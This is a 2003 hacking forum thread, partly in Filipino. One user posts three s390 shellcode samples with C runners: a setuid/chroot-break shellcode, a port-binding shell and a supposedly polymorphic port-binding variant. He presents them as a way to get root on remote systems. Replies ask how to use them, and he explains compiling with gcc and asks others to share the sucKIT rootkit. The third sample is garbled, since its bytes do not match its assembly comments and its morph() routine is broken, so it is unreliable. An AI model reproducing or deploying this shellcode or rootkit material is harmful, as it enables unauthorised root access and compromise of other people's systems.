|
|
Post by Verbl Kint on Jun 12, 2003 13:58:46 GMT -5
A shellcode is basically a simple program to get you root on a remote system. Once you're in as root (or at least setuid) you can pretty much do anything with the box as you want; modify the webpage, access the db backend, get passwords, whatever.
Listed below are recent good examples. Try to analyze the code to get an understanding on how it does what it does.
Kung meron pa sa inyo diyan na may mga shellcodes paki-share na lang din sa forum na to. Salamas!
Happy hacking!
verbl
|
|
|
|
Post by Verbl Kint on Jun 12, 2003 14:02:30 GMT -5
/*----------------------------------------------------------------------*/
/* s390 shellcode 0x0a / 0x0 free*/
/* setuid / setgid / chroot break*/
/* code jcyberpunk@thehackerschoice.com*/
/*----------------------------------------------------------------------*/
char shellcode[] =
"\x0d\x10"/* basr%r1,0*/
"\x41\x90\x10\x98"/* la%r9,152(%r1)*/
"\xa7\xa8\xfb\xb4"/* lhi%r10,-1100*/
"\xa7\x68\x04\x56"/* lhi%r6,1110*/
"\x1a\x6a"/* ar%r6,%r10*/
"\x42\x60\x10\x98"/* stc%r6,152(%r1)*/
"\x17\x22"/* xr%r2,%r2*/
"\x42\x20\x10\x9f"/* stc%r2,159(%r1)*/
"\x0d\xe9"/* basr%r14,%r9*/
"\xa7\x68\x04\x7a"/* lhi%r6,1146*/
"\x1a\x6a"/* ar%r6,%r10*/
"\x42\x60\x10\x99"/* stc%r6,153(%r1)*/
"\x0d\xe9"/* basr%r14,%r9*/
"\x41\x20\x10\x9c"/* la%r2,156(%r1)*/
"\x17\x33"/* xr%r3,%r3*/
"\xa7\x68\x04\x73"/* lhi%r6,1139*/
"\x1a\x6a"/* ar%r6,%r10*/
"\x42\x60\x10\x99"/* stc%r6,153(%r1)*/
"\x0d\xe9"/* basr%r14,%r9*/
"\x41\x20\x10\x9c"/* la%r2,156(%r1)*/
"\xa7\x68\x04\x89"/* lhi%r6,1161*/
"\x1a\x6a"/* ar%r6,%r10*/
"\x42\x60\x10\x99"/* stc%r6,153(%r1)*/
"\x0d\xe9"/* basr%r14,%r9*/
"\xa7\xb8\x05\x39"/* lhi%r11,1337*/
"\x1a\xba"/* ar%r11,%r10*/
"\xa7\x68\x04\x58"/* lhi%r6,1112*/
"\x1a\x6a"/* ar%r6,%r10*/
"\x42\x60\x10\x99"/* stc%r6,153(%r1)*/
"\x41\x20\x10\x9d"/* la%r2,157(%r1)*/
"\x0d\xe9"/* basr%r14,%r9*/
"\x46\xb0\x10\x58"/* bct%r11,88(%r1)*/
"\x41\x20\x10\x9e"/* la%r2,158(%r1)*/
"\xa7\x68\x04\x89"/* lhi%r6,1161*/
"\x1a\x6a"/* ar%r6,%r10*/
"\x42\x60\x10\x99"/* stc%r6,153(%r1)*/
"\x0d\xe9"/* basr %r14,%r9*/
"\xa7\x68\x04\x57"/* lhi%r6,1111*/
"\x1a\x6a"/* ar%r6,%r10*/
"\x42\x60\x10\x99"/* stc%r6,153(%r1)*/
"\x41\x20\x10\xa0"/* la%r2,160(%r1)*/
"\x50\x20\x10\xa8"/* st%r2,168(%r1)*/
"\x41\x30\x10\xa8"/* la%r3,168(%r1)*/
"\x17\x44"/* xr%r4,%r4*/
"\x42\x40\x10\xa7"/* stc%r4,167(%r1)*/
"\x50\x40\x10\xac"/* st%r4,172(%r1)*/
"\x41\x40\x10\xac"/* la%r4,172(%r1)*/
"\x0d\xe9"/* basr %r14,%r9*/
"\x0b\x17"/* svc 23 <--- after modification*/
"\x07\xfe"/* br%r14*/
"\x41\x2e\x2e\x5c"/* A..<---- used for mkdir,chroot,chdir*/
"\x2f\x62\x69\x6e"/* /bin*/
"\x2f\x73\x68\x5c";/* /sh\\*/
main()
{
void (*z)()=(void*)shellcode;
z();
}
|
|
|
|
Post by Verbl Kint on Jun 12, 2003 14:06:49 GMT -5
/*----------------------------------------------------------------------*/
/* s390 portbinding shellcode - svc opcode 0x0a free*/
/* code by jcyberpunk@thehackerschoice.com*/
/*----------------------------------------------------------------------*/
char shellcode[]=
"\x0d\x10"/* basr %r1,%r0*/
"\x41\x90\x10\xd4"/* la %r9,212(%r1)*/
"\xa7\x68\x04\x56"/* lhi %r6,1110*/
"\xa7\xa8\xfb\xb4"/* lhi %r10,-1100*/
"\x1a\x6a"/* ar %r6,%r10*/
"\x42\x60\x10\xd4"/* stc %r6,212(%r1)*/
"\xa7\x28\x04\x4e"/* lhi %r2,1102*/
"\x1a\x2a"/* ar %r2,%r10*/
"\x40\x20\xf0\x78"/* sth %r2,120(%r15)*/
"\xa7\x38\x7a\x69"/* lhi %r3,31337*/
"\x40\x30\xf0\x7a"/* sth %r3,122(%r15)*/
"\x17\x44"/* xr %r4,%r4*/
"\x50\x40\xf0\x7c"/* st %r4,124(%r15)*/
"\xa7\x38\x04\x4d"/* lhi %r3,1101*/
"\x1a\x3a"/* ar %r3,%r10*/
"\x90\x24\xf0\x80"/* stm %r2,%r4,128(%r15)*/
"\xa7\x28\x04\x4d"/* lhi %r2,1101*/
"\x1a\x2a"/* ar %r2,%r10*/
"\x41\x30\xf0\x80"/* la %r3,128(%r15)*/
"\x0d\xe9"/* basr %r14,%r9*/
"\x18\x72"/* lr %r7,%r2*/
"\x41\x30\xf0\x78"/* la %r3,120(%r15)*/
"\xa7\x88\x04\x5c"/* lhi %r8,1116*/
"\x1a\x8a"/* ar %r8,%r10*/
"\x18\x48"/* lr %r4,%r8*/
"\x90\x24\xf0\x80"/* stm %r2,%r4,128(%r15)*/
"\xa7\x28\x04\x4e"/* lhi %r2,1102*/
"\x1a\x2a"/* ar %r2,%r10*/
"\x41\x30\xf0\x80"/* la %r3,128(%r15)*/
"\x0d\xe9"/* basr %r14,%r9*/
"\x18\x27"/* lr %r2,%r7*/
"\xa7\x38\x04\x4d"/* lhi %r3,1101*/
"\x1a\x3a"/* ar %r3,%r10*/
"\x90\x23\xf0\x80"/* stm %r2,%r3,128(%r15)*/
"\xa7\x28\x04\x50"/* lhi %r2,1104*/
"\x1a\x2a"/* ar %r2,%r10*/
"\x41\x30\xf0\x80"/* la %r3,128(%r15)*/
"\x0d\xe9"/* basr %r14,%r9*/
"\x18\x27"/* lr %r2,%r7*/
"\x41\x30\xf0\x78"/* la %r3,120(%r15)*/
"\x90\x23\xf0\x80"/* stm %r2,%r3,128(%r15)*/
"\x50\x80\xf0\x88"/* st %r8,136(%r15)*/
"\xa7\x28\x04\x51"/* lhi %r2,1105*/
"\x1a\x2a"/* ar %r2,%r10*/
"\x41\x30\xf0\x80"/* la %r3,128(%r15)*/
"\x0d\xe9"/* basr %r14,%r9*/
"\xa7\x68\x04\x8b"/* lhi %r6,1163*/
"\x1a\x6a"/* ar %r6,%r10*/
"\x42\x60\x10\xd5"/* stc %r6,213(%r1)*/
"\xa7\x38\x04\x4e"/* lhi %r3,1102*/
"\x1a\x3a"/* ar %r3,%r10*/
"\x0d\xe9"/* basr %r14,%r9*/
"\xa7\x3a\xff\xff"/* ahi %r3,-1*/
"\x0d\xe9"/* basr %r14,%r9*/
"\xa7\x3a\xff\xff"/* ahi %r3,-1*/
"\x0d\xe9"/* basr %r14,%r9*/
"\xa7\x68\x04\x57"/* lhi %r6,1111*/
"\x1a\x6a"/* ar %r6,%r10*/
"\x42\x60\x10\xd5"/* stc %r6,213(%r1)*/
"\x41\x20\x10\xd8"/* la %r2,216(%r1)*/
"\x50\x20\x10\xe0"/* st %r2,224(%r1)*/
"\x41\x30\x10\xe0"/* la %r3,224(%r1)*/
"\x17\x44"/* xr %r4,%r4*/
"\x42\x40\x10\xdf"/* stc %r4,223(%r1)*/
"\x50\x40\x10\xe4"/* st %r4,228(%r1)*/
"\x41\x40\x10\xe4"/* la %r4,228(%r1)*/
"\x0d\xe9"/* basr %r14,%r9*/
"\x0b\x66"/* svc 102 <--- after modification*/
"\x07\xfe"/* br %r14*/
"\x2f\x62\x69\x6e"/* /bin*/
"\x2f\x73\x68\x5c";/* /sh\*/
main()
{
void (*z)()=(void*)shellcode;
z();
}
|
|
|
|
Post by Verbl Kint on Jun 12, 2003 14:13:54 GMT -5
/*----------------------------------------------------------------------
s390 shellcode 0xa0 / 0x0 free
portbinding shellcode (polymorph / repeats itself every 32th copy)
code plasmoid@thehackerschoice.com -- 20030401
----------------------------------------------------------------------*/
#define X10x000010 /* Register (%r3) offset 1 */
#define X3 0x0000f4 /* Register (%r3) offset 3 */
#define X20x000002 /* Register (%r3) offset 2 */
#define BF 128 /* Internal buffer length */
#define LN 439 /* LN constant */
unsigned char shellcode[] =
"\x09\x09\x60\x40" /* basr %r14,%r9 */
"\x50\x60"/* lhi %r6,1111 */
"\x2e\x27\x2f\x2c"/* ar %r6,%r10 */
"\x2d\x59\x22"/* stc %r6,153(%r1) */
"\x50\x60\x40"/* la %r2,160(%r1) */
"\x50\x60\x22"/* st %r2,168(%r1) */
"\x7e\x2d\x2e\xf4"/* la %r3,168(%r1) */
"\x09\x40\x50"/* xr %r4,%r4 */
"\x60\x40\x6c"/* stc %r4,167(%r1) */
"\x2e\x59\x50\x60"/* basr %r14,%r9 */
"\x40\x50\x60\x40"/* la %r2,156(%r1) */
"\x50\x60\x40\x50"/* xr %r3,%r3 */
"\x60\x40\x50"/* lhi %r6,1139 */
"\x5e\x2e\xf4"/* ar %r6,%r10 */
"\x09\x40\x50"/* stc %r6,153(%r1) <--- initialize */
"\x60\x40\x2f"/* st %r2,168(%r1) */
"\x5c\x40\x50"/* la %r3,168(%r1) */
"\x60\x40\x50"/* xr %r4,%r4 */
"\x60\x40\x50\x60"/* stc %r4,167(%r1) */
"\x40\x50\x60"/* basr %r14,%r9 */
"\x40\x50\x60"/* la %r2,156(%r1) */
"\x5f\x5c\x5f"/* xr %r3,%r3 */
"\x40\x50\x60"/* lhi %r6,1139 */
"\x40\x50\x60"/* ar %r6,%r10 */
"\x22\x25\x73\x21"/* stc %r6,153(%r1) */
"\x22\xf4\x09"/* basr %r14,%r9 */
"\x50\x60\x40"/* la %r2,156(%r1) <--- rotation */
"\x69\x60\x40"/* lhi %r6,1161 */
"\x50\x60\x40"/* ar %r6,%r10 */
"\x50\x60\x40\x50"/* stc %r6,153(%r1) */
"\x60\x40\x50\x5f"/* basr %r14,%r9 */
"\x5f\x5f\x2f"/* lhi %r11,1337 */
"\x22\x50\x60\x40"/* ar %r11,%r10 */
"\x22\x5c\xf4\x09"/* lhi %r6,1112 */
"\x60\x40\x50"/* ar %r6,%r10 */
"\x7c\x40\x50"/* stc %r6,153(%r1) */
"\x60\x40\x50"/* la %r2,157(%r1) */
"\x60\x40\x50"/* basr %r14,%r9 */
"\x60\x40\x2f\x22"/* bct %r11,88(%r1) <--- regs ok? */
"\x40\x50\x60"/* la %r2,158(%r1) */
"\x22\x5c\x60\x40"/* lhi %r6,1161 */
"\x50\x6f\x40\x21"/* ar %r6,%r10 */
"\xf4\x09\x50"/* stc %r6,153(%r1) */
"\x60\x40\x6c"/* basr %r1,0 */
"\x60\x40\x50"/* la %r9,152(%r1) */
"\x60\x40\x50"/* lhi %r10,-1100 */
"\x60\x40\x50"/* lhi %r6,1110 */
"\x5d\x40\x50"/* ar %r6,%r10 */
"\x60\x40\x50"/* stc %r6,152(%r1) */
"\x6f\x40\x21\x5f"/* xr %r2,%r2 */
"\x5f\x2e\x2f\xf4"/* stc %r6,152(%r1) */
"\x09\x60\x40\x50\x60"/* xr %r2,%r2 */
"\x5c\x50\x5f\x40"/* stc %r2,159(%r1) */
"\x50\x5f\x40"/* basr %r14,%r9 <--- hal or ... */
"\x50\x60\x40"/* lhi %r6,1146 ... camp? */
"\x5c\x2e\x5f\x5f"/* ar %r6,%r10 */
"\x5f\x2e\x2f"/* stc %r6,153(%r1) */
"\x60\x40\x50"/* basr %r14,%r9 */
"\x60\x22\x7e"/* st %r4,172(%r1) */
"\x5c\xf4\x09\x60"/* basr %r14,%r9 <--- reset cnt */
"\x40\x50\x60\x40"/* lhi %r6,1146 */
"\x58\x60\x5c"/* ar %r6,%r10 */
"\x2f\x60\x5c"/* stc %r6,153(%r1) */
"\x50\x60\x40"/* basr %r14,%r9 */
"\x50\x60\x40"/* st %r4,172(%r1) */
"\x50\x60\x40"/* la %r4,172(%r1) */
"\x50\x60\x40"/* basr %r14,%r9 */
"\x5f\x5f\x5f\x2e\x2f"/* svc 23 <--- spawn shell */
"\xf4\x09\x60"/* lhi %r6,1161 */
"\x40\x50\x60"/* ar %r6,%r10 <--- acquire lck */
"\x28\x50\x5c\x40"/* stc %r6,153(%r1) */
"\x5f\x5f\x5f"/* basr %r14,%r9 */
"\x2e\x60\x40"/* lhi %r11,1337 */
"\x50\x5f\x2e"/* ar %r11,%r10 */
"\x2e\x2d\x2d"/* lhi %r6,1112 */
"\x7e\x7e\x22\x50"/* ar %r6,%r10 */
"\x60\x40\x7e\x2d\x2e"/* stc %r6,153(%r1) */
"\xf4\x09\x40\x50"/* la %r2,157(%r1) */
"\x60\x40\x50\x60"/* basr %r14,%r9 */
"\x5a\x2c\x2d"/* bct %r11,88(%r1) */
"\x2d\x50\x60\x40"/* la %r2,158(%r1) */
"\x2f\x60\x40\x50"/* lhi %r6,1161 */
"\x60\x40\x50"/* ar %r6,%r10 */
"\x60\x40\x50\x60"/* stc %r6,153(%r1) */
"\x40\x50\x60"/* basr %r1,0 <--- release lck */
"\x40\x50\x5c\xf4"/* la %r9,152(%r1) */
"\x09\x60\x40\x50"/* lhi %r10,-1100 */
"\x60\x40\x50"/* lhi %r6,1110 */
"\x60\x5c\x5f"/* ar %r6,%r10 */
"\x5f\x2e\x50\x60"/* stc %r6,152(%r1) */
"\x28\x50\x60"/* xr %r2,%r2 */
"\x40\x2f\x60\x40\x50"/* stc %r6,152(%r1) */
"\x60\x40\x50\x60"/* xr %r2,%r2 */
"\x5f\x5f\x5f\x5f"/* stc %r2,159(%r1) */
"\x5f\x5f\x29\xf4"/* basr %r14,%r9 */
"\x09\x09\x50"/* lhi %r6,1146 */
"\x5c\x40\x50"/* ar %r6,%r10 */
"\x60\x6c\x50"/* stc %r6,153(%r1) */
"\x60\x2f\x2d\x2d"/* basr %r14,%r9 */
"\x2d\x2d\x2d\x7e"/* st %r4,172(%r1) */
"\x7e\x22\x40"/* basr %r14,%r9 */
"\x2f\x60\x40"/* lhi %r6,1146 */
"\x50\x60\x40\x50\x2d"/* ar %r6,%r10 */
"\x25\x73\xf4\x09"/* stc %r6,153(%r1) */
"\x09\x60\x40"/* basr %r14,%r9 */
"\x59\x60\x40"/* st %r4,172(%r1) */
"\x50\x5c\x40"/* la %r4,172(%r1) */
"\x50\x60\x40\x50"/* basr %r14,%r9 */
"\x60\x40\x50\x60\x40"/* svc 23 <--- fork */
"\x2f\xf4\x09\x09"/* lhi %r6,1161 */
"\x60\x40\x7c\x60"/* ar %r6,%r10 */
"\x40\x50\x60\x22"/* stc %r6,153(%r1) */
"\x78\x5f\x5f"/* basr %r14,%r9 */
"\x5f\x5f\x5f\x5f"/* lhi %r11,1337 */
"\x2e\x5e\xf4"/* ar %r11,%r10 */
"\x09\x09\x50\x60"/* lhi %r6,1112 */
"\x7c\x50\x60\x40"/* ar %r6,%r10 */
"\x50\x60\x40\x50"/* .data */
"\x60\x40\x50"/* la %r2,157 self-modifying code */
"\x60\x5c\x50"/* basr %r14,%r9 snippet following: */
"\x60\x40\xf4"/* bct %r11,88(%r1) ^ */
"\x09\x09\x50\x60"/* la %r2,158(%r1) | */
"\x6a\x50\x60"/* lhi %r6,1161 | */
"\x40\x50\x60"/* ar %r6,%r10 v */
"\x40\x50\x60\x40"/* stc %r6,153(%r1) */
"\x50\x60\x40"/* /bin/sh strings */
"\x59\x60\x25\x73";/* eof\\ */
void morph()
{
int i, j;
unsigned char b[LN + BF];
/*
* Rotate registers
*/
for (i = 0, j = 0; i <= LN - 1; i++, j = (j + 1) % 3) {
if (!(shellcode - ((j + X2) * X1 + X2 * X1)))
shellcode -= (j + X2) * X1;
if (!(shellcode - X3))
shellcode ^= 0xfe;
}
/*
* Scramble pseudo instructions
*/
snprintf(b, LN + BF - 1, shellcode, "\x44\x6f\x68", "\x52\x6f\x77", "\n");
/*
* Shift register offsets
*/
for (i = 0; i <= LN; i++, write(0, &b, 1))
if (!(shellcode - ((j + X2) * X1 + X2 * X1)))
shellcode -= (j + 1) % (j + X2) * X1 + X2 * X1;
}
void main()
{
morph();
}
|
|
|
|
Post by fr33ag3nt on Jun 14, 2003 12:39:57 GMT -5
nice post..... tutorial naman jan. hehe
|
|
|
|
Post by 3razZz3r on Nov 27, 2003 5:07:37 GMT -5
How do I use these SHELLCODES? Simply compile them and run in the unix shell using "any" ID?
|
|
|
|
Post by Verbl Kint on Dec 2, 2003 14:47:08 GMT -5
Yes you would have to compile them using cc or gcc, you might need to modify them though as I think this was designed to compile on gcc versions earlier than 2.95 so there could be some problems getting them to compile correctly on newer versions.
Kung may kopya kayo ng sucKIT rootkit please post niyo naman or at least provide the url, thanks.
|
|
|
|
Post by kkakenny on Jun 22, 2004 10:58:04 GMT -5
Nice shell codes. Buti your willing to share hehe
|
|
